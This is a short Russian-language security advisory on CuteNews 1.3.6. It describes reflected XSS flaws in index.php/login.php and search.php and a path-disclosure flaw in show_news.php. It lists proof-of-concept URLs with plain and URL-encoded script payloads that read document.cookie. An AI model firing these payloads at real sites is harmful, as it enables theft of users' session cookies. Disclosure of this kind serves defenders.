Программа: CuteNews 1.3.6

Уязвимость позволяет удаленному
пользователю произвести XSS нападение и
получить доступ к потенциально важным
данным других пользователей. Уязвимость
обнаружена в сценариях 'login.php' и 'search.php' из-за
недостаточной обработки входных данных.
Удаленный пользователь может с помощью
специально сформированного URL выполнить
произвольный HTML сценарий в браузере жертвы
в контексте безопасности уязвимого сайта.

Примеры:

http://[target]/[path]/index.php?lastusername='> <script>alert(document.cookie)</script><!--

http://[target]/[path]/index.php? lastusername=
%27%3E%3Cscript%3Ealert%28document. cookie%29%3C%2Fscript%3E%3C%21--

http://[target]/[path]/search.php?selected_search_arch=> <
script>alert(document.cookie)</ script><!--

http://[target]/[path]/search.php?selected_search_arch=
%3E%3Cscript%3Ealert%28document.cookie%29%3C %2Fscript%3E%3C%21—

Удаленный пользователь может с помощью
специально сформированного URL получить
данные об установочной директории.

Пример:

http://[target]/[path]/show_news.php?archive=whathell

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии